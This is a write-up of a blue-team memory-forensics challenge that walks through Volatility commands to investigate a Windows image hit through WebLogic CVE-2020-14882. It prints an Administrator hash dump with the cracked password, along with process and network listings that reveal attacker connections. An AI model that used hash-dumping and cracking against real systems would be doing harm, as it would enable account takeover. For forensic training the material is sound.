
Introduction

Hi, I'm a hopelessly weak wannabe engineer.
This article is my writeup of the "BSidesJeddah-Part2" challenge on CyberDefenders (see the link below).

Note: this challenge tests Blue-team analysis skills rather than Red-team penetration testing.

What is the SHA256 hash value of the RAM image?

The following command gives the answer.
[screenshot: 1.png]

Ans: 5b3b1e1c92ddb1c128eca0fa8c917c16c275ad4c95b19915a288a745f9960f39

What time was the RAM image acquired according to the suspect system? (YYYY-MM-DD HH:MM:SS)

The following command gives the answer.

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.info.Info

[screenshot: 2.png]

Ans: 2021-08-06 16:13:23

What volatility2 profile is the most appropriate for this machine. imageinfo will take a long try to figure another way to determine the profile? (ex: Win10x86_14393)

This one is found with a Volatility 2 command. Run the following.

remnux@remnux:~/Downloads$ vol.py -f memory.mem imageinfo
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win10x64_17134, Win10x64_14393, Win10x64_10586, Win10x64_16299, Win2016x64_14393, Win10x64_17763, Win10x64_15063 (Instantiated with Win10x64_15063)
                     AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/remnux/Downloads/memory.mem)
                      PAE type : No PAE
                           DTB : 0x1ab000L
                          KDBG : 0xf8024b96a500L
          Number of Processors : 4
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff8024b9bc000L
                KPCR for CPU 1 : 0xffffa601d4e00000L
                KPCR for CPU 2 : 0xffffa601d4c40000L
                KPCR for CPU 3 : 0xffffa601d4cc3000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2021-08-06 16:13:23 UTC+0000
     Image local date and time : 2021-08-06 09:13:23 -0700
remnux@remnux:~/Downloads$ 

Enter the candidate whose character count matches.

Ans: Win2016x64_14393

What is the computer's name?

Look at the environment variables. The following command gets you most of the way there.

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.envars.Envars
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
PID	Process	Block	Variable	Value

[screenshot: 4.png]
That is hard to read, though, so filter with something like grep COMPUTERNAME.

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.envars.Envars | grep COMPUTERNAME
560	winlogon.exe	0x2bb9af213e0	COMPUTERNAME	WIN-8QOTRH7EMHC
568	wininit.exe	0x1c700f413e0	COMPUTERNAME	WIN-8QOTRH7EMHC
652	services.exe	0x25283c21730	COMPUTERNAME	WIN-8QOTRH7EMHC
664	lsass.exe	0x2536c841730	COMPUTERNAME	WIN-8QOTRH7EMHC
764	svchost.exe	0x1e752421910	COMPUTERNAME	WIN-8QOTRH7EMHC
824	svchost.exe	0x29276aa19a0	COMPUTERNAME	WIN-8QOTRH7EMHC
912	dwm.exe	0x18925da1730	COMPUTERNAME	WIN-8QOTRH7EMHC
972	svchost.exe	0x24f47da1910	COMPUTERNAME	WIN-8QOTRH7EMHC
996	svchost.exe	0x1bd02dd1990	COMPUTERNAME	WIN-8QOTRH7EMHC
508	svchost.exe	0x207a00b1910	COMPUTERNAME	WIN-8QOTRH7EMHC
400	svchost.exe	0x184ddf21990	COMPUTERNAME	WIN-8QOTRH7EMHC
944	svchost.exe	0x1e875f71990	COMPUTERNAME	WIN-8QOTRH7EMHC
1092	svchost.exe	0x23f7cb41990	COMPUTERNAME	WIN-8QOTRH7EMHC
1100	svchost.exe	0x1a9ed7019a0	COMPUTERNAME	WIN-8QOTRH7EMHC
1592	spoolsv.exe	0x19363c31910	COMPUTERNAME	WIN-8QOTRH7EMHC
1668	svchost.exe	0x24a25ef1910	COMPUTERNAME	WIN-8QOTRH7EMHC
1732	svchost.exe	0x17bae201910	COMPUTERNAME	WIN-8QOTRH7EMHC

...(omitted)

The name is visible, so answer with it.

Ans: WIN-8QOTRH7EMHC

What is the system IP address?

The following command gives a reasonable picture.

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.netscan.NetScan
Volatility 3 Framework 2.4.1

[screenshot: 5.png]

Ans: 192.168.144.131

How many established network connections were at the time of acquisition?

Just filter on ESTABLISHED.
[screenshot: 6.png]
There are 12 rows.

Ans: 12

What is the PID of explorer.exe?

It can be seen with the following command.

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.pslist.PsList | grep explorer.exe
2676	1140	explorer.exe	0xb68cb2d36800	50	-	1	False	2021-08-06 15:29:16.000000 	N/A	Disabled
remnux@remnux:~/Downloads$ 

Ans: 2676

What is the title of the webpage the admin visited using IE?

This one is found with a Volatility 2 command: iehistory.
Run it with the Windows profile version found in Q2.

remnux@remnux:~/Downloads$ vol.py -f memory.mem --profile=Win2016x64_14393 iehistory
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
**************************************************
Process: 2676 explorer.exe
Cache type "DEST" at 0x629d939
Last modified: 2021-08-06 08:39:52 UTC+0000
Last accessed: 2021-08-06 15:39:52 UTC+0000
URL: Administrator@https://news.google.com/topstories?hl=en-US&gl=US&ceid=US:en
Title: Google News
remnux@remnux:~/Downloads$ 

That reveals the title.

Ans: Google News

What company developed the program used for memory acquisition?

In memory forensics, looking at the commands a malicious process ran sometimes turns up obfuscated C2 addresses or commands hidden in them, so checking windows.cmdline.CmdLine early on is an iron rule.

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.cmdline.CmdLine
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
PID	Process	Args

4	System	Required memory at 0x20 is not valid (process exited?)
292	smss.exe	\SystemRoot\System32\smss.exe
412	csrss.exe	%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
504	smss.exe	Required memory at 0xbc4f0cb020 is not valid (process exited?)
512	csrss.exe	%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
560	winlogon.exe	winlogon.exe
568	wininit.exe	wininit.exe
652	services.exe	C:\Windows\system32\services.exe
664	lsass.exe	C:\Windows\system32\lsass.exe
764	svchost.exe	C:\Windows\system32\svchost.exe -k DcomLaunch
824	svchost.exe	C:\Windows\system32\svchost.exe -k RPCSS
912	dwm.exe	"dwm.exe"
972	svchost.exe	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
996	svchost.exe	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
508	svchost.exe	C:\Windows\system32\svchost.exe -k netsvcs
400	svchost.exe	C:\Windows\system32\svchost.exe -k LocalService
944	svchost.exe	C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1092	svchost.exe	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1100	svchost.exe	C:\Windows\system32\svchost.exe -k NetworkService
1592	spoolsv.exe	C:\Windows\System32\spoolsv.exe
1668	svchost.exe	C:\Windows\System32\svchost.exe -k utcsvc
1732	svchost.exe	C:\Windows\System32\svchost.exe -k smbsvcs
1764	svchost.exe	C:\Windows\system32\svchost.exe -k appmodel
1852	wlms.exe	C:\Windows\system32\wlms\wlms.exe
1876	MsMpEng.exe	"C:\Program Files\Windows Defender\MsMpEng.exe"
1896	vm3dservice.ex	C:\Windows\system32\vm3dservice.exe
1904	vmtoolsd.exe	"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
1912	VGAuthService.	"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
892	vm3dservice.ex	vm3dservice.exe -n
2136	svchost.exe	C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
2812	dllhost.exe	C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
2912	msdtc.exe	C:\Windows\System32\msdtc.exe
3004	WmiPrvSE.exe	C:\Windows\system32\wbem\wmiprvse.exe
2560	WmiPrvSE.exe	C:\Windows\system32\wbem\wmiprvse.exe
3176	svchost.exe	C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
4064	RuntimeBroker.	C:\Windows\System32\RuntimeBroker.exe -Embedding
2196	sihost.exe	sihost.exe
2756	svchost.exe	C:\Windows\system32\svchost.exe -k UnistackSvcGroup
2424	taskhostw.exe	taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1140	userinit.exe	Required memory at 0x59eced020 is not valid (process exited?)
2676	explorer.exe	C:\Windows\Explorer.EXE
3496	ShellExperienc	"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
3408	SearchUI.exe	"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
2552	ServerManager.	"C:\Windows\system32\ServerManager.exe" 
3732	vmtoolsd.exe	"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
4172	jusched.exe	"C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" 
4356	cmd.exe	"C:\Windows\System32\cmd.exe" /C "C:\Users\Administrator\Desktop\wls1411\user_projects\domains\base_domain\bin\startNodeManager.cmd" 
4364	conhost.exe	\??\C:\Windows\system32\conhost.exe 0x4
4456	java.exe	"C:\PROGRA~1\Java\JDK18~1.0_2\bin\java.exe"   -server -Xms32m -Xmx200m -Djdk.tls.ephemeralDHKeySize=2048 -Dcoherence.home=C:\Users\ADMINI~1\Desktop\wls1411\coherence -Dbea.home=C:\Users\ADMINI~1\Desktop\wls1411  -Dweblogic.RootDirectory=C:\Users\ADMINI~1\Desktop\wls1411\USER_P~1\domains\BASE_D~1  -Djava.system.class.loader=com.oracle.classloader.weblogic.LaunchClassLoader "-Djava.security.policy=C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server\lib\weblogic.policy" "-Dweblogic.nodemanager.JavaHome=C:\PROGRA~1\Java\JDK18~1.0_2" weblogic.NodeManager -v
4556	cmd.exe	"C:\Windows\System32\cmd.exe" /C "C:\Users\Administrator\Desktop\wls1411\user_projects\domains\base_domain\bin\startWebLogic.cmd" 
4564	conhost.exe	\??\C:\Windows\system32\conhost.exe 0x4
4736	cmd.exe	cmd  /c "C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby\bin\startNetworkServer.bat "
4752	java.exe	C:\PROGRA~1\Java\JDK18~1.0_2\bin\java  -server   -Xms256m -Xmx512m  -cp C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server\lib\weblogic-launcher.jar -Dlaunch.use.env.classpath=true -Dweblogic.Name=AdminServer -Djava.security.policy=C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server\lib\weblogic.policy  -Dweblogic.ProductionModeEnabled=true -Djava.system.class.loader=com.oracle.classloader.weblogic.LaunchClassLoader  -javaagent:C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server\lib\debugpatch-agent.jar -da -Dwls.home=C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server -Dweblogic.home=C:\Users\ADMINI~1\Desktop\wls1411\wlserver\server     -Djava.endorsed.dirs=C:\PROGRA~1\Java\JDK18~1.0_2\jre\lib\endorsed;C:\Users\ADMINI~1\Desktop\wls1411\oracle_common\modules\endorsed;C:\Users\ADMINI~1\Desktop\wls1411\wlserver\modules\endorsed  weblogic.Server
4772	java.exe	"C:\PROGRA~1\Java\JDK18~1.0_2\bin\java.exe"  -Djava.security.manager -Djava.security.policy=C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby\derbyServer.policy "-Dderby.system.home=C:\Users\ADMINI~1\Desktop\wls1411\USER_P~1\domains\BASE_D~1\common\db" -classpath "C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derby.jar;C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derbynet.jar;C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derbyclient.jar;C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derbytools.jar;C:\Users\Administrator\Desktop\wls1411\wlserver\common\derby/lib/derbyoptionaltools.jar" org.apache.derby.drda.NetworkServerControl start 
1392	jucheck.exe	"C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe" -auto
2824	fontdrvhost.ex	"fontdrvhost.exe"
840	armsvc.exe	"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
4344	powershell.exe	powershell -e [encoded command omitted]
4636	conhost.exe	\??\C:\Windows\system32\conhost.exe 0x4
4200	powershell.exe	Required memory at 0x9888ee7020 is not valid (process exited?)
2712	powershell.exe	Required memory at 0xab2c6e7020 is not valid (process exited?)
2132	powershell.exe	Required memory at 0x9bb4dd9020 is not valid (process exited?)
4264	powershell.exe	Required memory at 0x1002ac020 is not valid (process exited?)
3684	powershell.exe	Required memory at 0xe6d36ae020 is not valid (process exited?)
3676	powershell.exe	Required memory at 0x65c73a1020 is not valid (process exited?)
3520	powershell.exe	Required memory at 0xa36029e020 is not valid (process exited?)
1012	powershell.exe	Required memory at 0x5afb111020 is not valid (process exited?)
2200	powershell.exe	Required memory at 0x91e1d32020 is not valid (process exited?)
776	powershell.exe	Required memory at 0xe57ea22020 is not valid (process exited?)
1616	powershell.exe	Required memory at 0x508be21020 is not valid (process exited?)
2688	mmc.exe	"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
1488	svchost.exe	"C:\Users\Administrator\Desktop\svchost.exe"
4596	notepad.exe	"C:\Windows\System32\notepad.exe" exfiltrator.txt
2568	RamCapture64.e	"C:\Users\Administrator\Desktop\RamCapturer\x64\RamCapture64.exe" 
3524	conhost.exe	\??\C:\Windows\system32\conhost.exe 0x4
remnux@remnux:~/Downloads$ 

Looking at these results, PID 2568 is running RamCapture64.e.
So is that what took the dump? Searching for this file name, I found it on the following site.

Answer with this company's name.

Ans: BelkaSoft

What is the administrator user password?

Go after the NTLM hash values. Get them with the following command.

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.hashdump.Hashdump
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
User	rid	lmhash	nthash

Administrator	500	aad3b435b51404eeaad3b435b51404ee	3aff70b832f6170bda6f7b641563f60b
Guest	501	aad3b435b51404eeaad3b435b51404ee	31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount	503	aad3b435b51404eeaad3b435b51404ee	31d6cfe0d16ae931b73c59d7e0c089c0
remnux@remnux:~/Downloads$ 

They can be cracked on the following site.

[screenshot: 10.png]

Ans: 52(dumbledore)oxim_

What is the version of the WebLogic server installed on the system?

This is a question I could not solve until Q16.
Spoiler: this machine was hit by a CVE-2020-14882 attack, and I derived the answer from the WebLogic versions affected by it.
Check Trend Micro's blog for the affected versions.

  • 10.3.6.0.0
  • 12.1.3.0.0
  • 12.2.1.3.0
  • 12.2.1.4.0
  • 14.1.1.0.0

As for which of the above versions to pick, checking the file dump showed the version in a folder name. I checked with the windows.filescan.Filescan command.
[screenshot: 11.png]
It is 14.1.1.0.0.

Ans: 14.1.1.0.0

The admin set a port forward rule to redirect the traffic from the public port to the WebLogic admin portal port. What is the public and WebLogic admin portal port number? Format PublicPort:WebLogicPort (22:1337)

Just check windows.netscan.Netscan.

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.netscan.NetScan
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
Offset	Proto	LocalAddr	LocalPort	ForeignAddr	ForeignPort	State	PID	Owner	Created

0xb68cb05a9300	TCPv4	0.0.0.0	49668	0.0.0.0	0	LISTENING	1592	spoolsv.exe	2021-08-06 15:26:34.000000 
0xb68cb05a9300	TCPv6	::	49668	::	0	LISTENING	1592	spoolsv.exe	2021-08-06 15:26:34.000000 
0xb68cb0751010	TCPv4	192.168.144.131	80	0.0.0.0	0	LISTENING	508	svchost.exe	2021-08-06 15:26:45.000000 
0xb68cb0766d40	UDPv6	::1	1900	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb079bbd0	UDPv6	::1	60614	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb0a9fec0	UDPv4	0.0.0.0	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
0xb68cb0f05350	UDPv4	192.168.144.131	138	*	0		4	System	2021-08-06 15:26:24.000000 
0xb68cb1254ec0	TCPv4	0.0.0.0	135	0.0.0.0	0	LISTENING	824	svchost.exe	2021-08-06 15:26:17.000000 
0xb68cb1cd12f0	TCPv4	0.0.0.0	135	0.0.0.0	0	LISTENING	824	svchost.exe	2021-08-06 15:26:17.000000 
0xb68cb1cd12f0	TCPv6	::	135	::	0	LISTENING	824	svchost.exe	2021-08-06 15:26:17.000000 
0xb68cb1e278a0	TCPv4	0.0.0.0	49664	0.0.0.0	0	LISTENING	568	wininit.exe	2021-08-06 15:26:17.000000 
0xb68cb1e278a0	TCPv6	::	49664	::	0	LISTENING	568	wininit.exe	2021-08-06 15:26:17.000000 
0xb68cb1ec97a0	TCPv4	192.168.144.131	139	0.0.0.0	0	LISTENING	4	System	2021-08-06 15:26:24.000000 
0xb68cb1ed8ec0	UDPv4	0.0.0.0	0	*	0		2136	svchost.exe	2021-08-06 15:26:41.000000 
0xb68cb1ed8ec0	UDPv6	::	0	*	0		2136	svchost.exe	2021-08-06 15:26:41.000000 
0xb68cb1f099e0	UDPv4	192.168.144.131	137	*	0		4	System	2021-08-06 15:26:24.000000 
0xb68cb1f6e740	TCPv4	127.0.0.1	49676	127.0.0.1	49675	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb1fc0dc0	TCPv4	0.0.0.0	49664	0.0.0.0	0	LISTENING	568	wininit.exe	2021-08-06 15:26:17.000000 
0xb68cb22479f0	UDPv4	192.168.144.131	60615	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb22a9430	UDPv4	127.0.0.1	60616	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb22a9ec0	UDPv6	fe80::5caf:aaae:b035:834d	60613	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb230b010	UDPv4	0.0.0.0	5353	*	0		1100	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb2315dd0	UDPv4	127.0.0.1	1900	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb231f480	UDPv4	192.168.144.131	1900	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb2344cf0	TCPv4	0.0.0.0	49669	0.0.0.0	0	LISTENING	652	services.exe	2021-08-06 15:26:56.000000 
0xb68cb2344cf0	TCPv6	::	49669	::	0	LISTENING	652	services.exe	2021-08-06 15:26:56.000000 
0xb68cb2352330	TCPv4	0.0.0.0	49669	0.0.0.0	0	LISTENING	652	services.exe	2021-08-06 15:26:56.000000 
0xb68cb23b3aa0	UDPv4	0.0.0.0	5050	*	0		400	svchost.exe	2021-08-06 15:28:56.000000 
0xb68cb2404540	UDPv4	0.0.0.0	0	*	0		400	svchost.exe	2021-08-06 15:26:34.000000 
0xb68cb2405ec0	UDPv4	0.0.0.0	0	*	0		400	svchost.exe	2021-08-06 15:26:34.000000 
0xb68cb2405ec0	UDPv6	::	0	*	0		400	svchost.exe	2021-08-06 15:26:34.000000 
0xb68cb2421b30	UDPv4	0.0.0.0	123	*	0		400	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb24444e0	UDPv4	0.0.0.0	0	*	0		508	svchost.exe	2021-08-06 15:26:41.000000 
0xb68cb24444e0	UDPv6	::	0	*	0		508	svchost.exe	2021-08-06 15:26:41.000000 
0xb68cb246dd50	UDPv4	0.0.0.0	0	*	0		1100	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb246dd50	UDPv6	::	0	*	0		1100	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb24aeec0	TCPv4	0.0.0.0	445	0.0.0.0	0	LISTENING	4	System	2021-08-06 15:26:38.000000 
0xb68cb24aeec0	TCPv6	::	445	::	0	LISTENING	4	System	2021-08-06 15:26:38.000000 
0xb68cb24b8540	UDPv4	0.0.0.0	0	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb24ba010	UDPv4	0.0.0.0	500	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb24e88f0	TCPv4	0.0.0.0	47001	0.0.0.0	0	LISTENING	4	System	2021-08-06 15:26:39.000000 
0xb68cb24e88f0	TCPv6	::	47001	::	0	LISTENING	4	System	2021-08-06 15:26:39.000000 
0xb68cb24ff8f0	TCPv4	0.0.0.0	5985	0.0.0.0	0	LISTENING	4	System	2021-08-06 15:26:39.000000 
0xb68cb24ff8f0	TCPv6	::	5985	::	0	LISTENING	4	System	2021-08-06 15:26:39.000000 
0xb68cb26862d0	TCPv4	0.0.0.0	49668	0.0.0.0	0	LISTENING	1592	spoolsv.exe	2021-08-06 15:26:34.000000 
0xb68cb268ca30	TCPv4	0.0.0.0	49665	0.0.0.0	0	LISTENING	996	svchost.exe	2021-08-06 15:26:22.000000 
0xb68cb268ca30	TCPv6	::	49665	::	0	LISTENING	996	svchost.exe	2021-08-06 15:26:22.000000 
0xb68cb268e9c0	TCPv4	0.0.0.0	49665	0.0.0.0	0	LISTENING	996	svchost.exe	2021-08-06 15:26:22.000000 
0xb68cb26cdcf0	TCPv4	0.0.0.0	49666	0.0.0.0	0	LISTENING	664	lsass.exe	2021-08-06 15:26:26.000000 
0xb68cb26cdcf0	TCPv6	::	49666	::	0	LISTENING	664	lsass.exe	2021-08-06 15:26:26.000000 
0xb68cb26dbad0	UDPv4	0.0.0.0	5353	*	0		1100	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb26dbad0	UDPv6	::	5353	*	0		1100	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb271e340	TCPv4	0.0.0.0	49666	0.0.0.0	0	LISTENING	664	lsass.exe	2021-08-06 15:26:26.000000 
0xb68cb27f2d80	UDPv4	0.0.0.0	0	*	0		2136	svchost.exe	2021-08-06 15:26:41.000000 
0xb68cb28323e0	TCPv4	0.0.0.0	49667	0.0.0.0	0	LISTENING	508	svchost.exe	2021-08-06 15:26:31.000000 
0xb68cb28323e0	TCPv6	::	49667	::	0	LISTENING	508	svchost.exe	2021-08-06 15:26:31.000000 
0xb68cb2867460	TCPv4	0.0.0.0	49667	0.0.0.0	0	LISTENING	508	svchost.exe	2021-08-06 15:26:31.000000 
0xb68cb28a88a0	UDPv4	0.0.0.0	4500	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb28a88a0	UDPv6	::	4500	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb28a8ec0	UDPv4	0.0.0.0	500	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb28a8ec0	UDPv6	::	500	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb28aad30	UDPv4	0.0.0.0	4500	*	0		508	svchost.exe	2021-08-06 15:26:38.000000 
0xb68cb29366a0	UDPv4	0.0.0.0	123	*	0		400	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb29366a0	UDPv6	::	123	*	0		400	svchost.exe	2021-08-06 15:26:55.000000 
0xb68cb2a89010	TCPv4	127.0.0.1	49678	127.0.0.1	49677	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb2b50010	TCPv4	127.0.0.1	49675	127.0.0.1	49676	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb2b74860	UDPv6	fe80::5caf:aaae:b035:834d	1900	*	0		3176	svchost.exe	2021-08-06 15:27:19.000000 
0xb68cb2c58a50	TCPv6	7f00:1::98b0:6cb1:8cb6:ffff	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:00.000000 
0xb68cb2cc8580	TCPv4	127.0.0.1	49680	127.0.0.1	49679	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb2ccc010	TCPv4	127.0.0.1	49679	127.0.0.1	49680	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb2cffb20	TCPv6	c0a8:9083::c8e0:70b2:8cb6:ffff	5556	::	0	LISTENING	4456	java.exe	2021-08-06 15:30:03.000000 
0xb68cb2cffc70	TCPv6	7f00:1::98b0:6cb1:8cb6:ffff	1527	::	0	LISTENING	4772	java.exe	2021-08-06 15:30:07.000000 
0xb68cb2e135c0	TCPv4	127.0.0.1	49686	127.0.0.1	49687	ESTABLISHED	4752	java.exe	2021-08-06 15:30:39.000000 
0xb68cb2e57ec0	TCPv6	c0a8:9083::c8e0:70b2:8cb6:ffff	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:00.000000 
0xb68cb2f2eb70	TCPv4	192.168.144.131	49674	51.103.5.186	443	ESTABLISHED	2676	explorer.exe	2021-08-06 15:29:22.000000 
0xb68cb31c6380	TCPv4	127.0.0.1	49682	127.0.0.1	49681	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb31c7010	TCPv4	127.0.0.1	49681	127.0.0.1	49682	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb31e5010	TCPv4	127.0.0.1	49687	127.0.0.1	49686	ESTABLISHED	4752	java.exe	2021-08-06 15:30:39.000000 
0xb68cb31f0d00	TCPv4	127.0.0.1	49677	127.0.0.1	49678	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb3236b90	UDPv4	0.0.0.0	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
0xb68cb3236b90	UDPv6	::	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
0xb68cb3237830	TCPv4	192.168.144.131	49869	192.168.144.129	1339	CLOSE_WAIT	4344	powershell.exe	2021-08-06 15:51:40.000000 
0xb68cb3266780	TCPv6	2001:0:2851:782c:d2:133b:3f57:6f7c	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:00.000000 
0xb68cb32ba4f0	TCPv6	::1	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:01.000000 
0xb68cb335c260	UDPv4	0.0.0.0	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
0xb68cb33b4d00	TCPv4	192.168.144.131	80	192.168.144.1	27919	CLOSED	508	svchost.exe	2021-08-06 15:51:39.000000 
0xb68cb346d370	TCPv4	192.168.144.131	49903	192.168.144.129	1337	CLOSED	1488	svchost.exe	2021-08-06 16:17:52.000000 
0xb68cb34faa40	TCPv4	192.168.144.131	49901	192.168.144.129	1337	CLOSED	1488	svchost.exe	2021-08-06 16:15:52.000000 
0xb68cb350dab0	TCPv4	192.168.144.131	49907	192.168.144.129	1337	CLOSE_WAIT	1488	svchost.exe	2021-08-06 16:21:53.000000 
0xb68cb3578ec0	UDPv4	0.0.0.0	5355	*	0		1100	svchost.exe	2021-08-06 16:11:24.000000 
0xb68cb380eec0	UDPv4	0.0.0.0	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
0xb68cb380eec0	UDPv6	::	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
0xb68cb3832260	UDPv4	0.0.0.0	5355	*	0		1100	svchost.exe	2021-08-06 16:11:24.000000 
0xb68cb3832260	UDPv6	::	5355	*	0		1100	svchost.exe	2021-08-06 16:11:24.000000 
0xb68cb385e2e0	TCPv4	192.168.144.131	49905	192.168.144.129	1337	CLOSED	1488	svchost.exe	2021-08-06 16:19:53.000000 
0xe000001a9300	TCPv4	0.0.0.0	49668	0.0.0.0	0	LISTENING	1592	spoolsv.exe	2021-08-06 15:26:34.000000 
0xe000001a9300	TCPv6	::	49668	::	0	LISTENING	1592	spoolsv.exe	2021-08-06 15:26:34.000000 
0xf8024bdf2ec0	TCPv6	c0a8:9083::c8e0:70b2:8cb6:ffff	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:00.000000 
0xf8024be475c0	TCPv4	127.0.0.1	49686	127.0.0.1	49687	ESTABLISHED	4752	java.exe	2021-08-06 15:30:39.000000 
0xf8024bf34ec0	UDPv4	0.0.0.0	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
remnux@remnux:~/Downloads$ 

You can answer once you confirm that WebLogic's default admin console port is 7001 and that the web port 80 is open.

Ans: 80:7001

The attacker gain access through WebLogic Server. What is the PID of the process responsible for the initial exploit?

Use the windows.netscan.Netscan command from the previous question and check the PID that has port 7001 open.

0xb68cb2c58a50	TCPv6	7f00:1::98b0:6cb1:8cb6:ffff	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:00.000000 
0xb68cb2cc8580	TCPv4	127.0.0.1	49680	127.0.0.1	49679	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb2ccc010	TCPv4	127.0.0.1	49679	127.0.0.1	49680	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
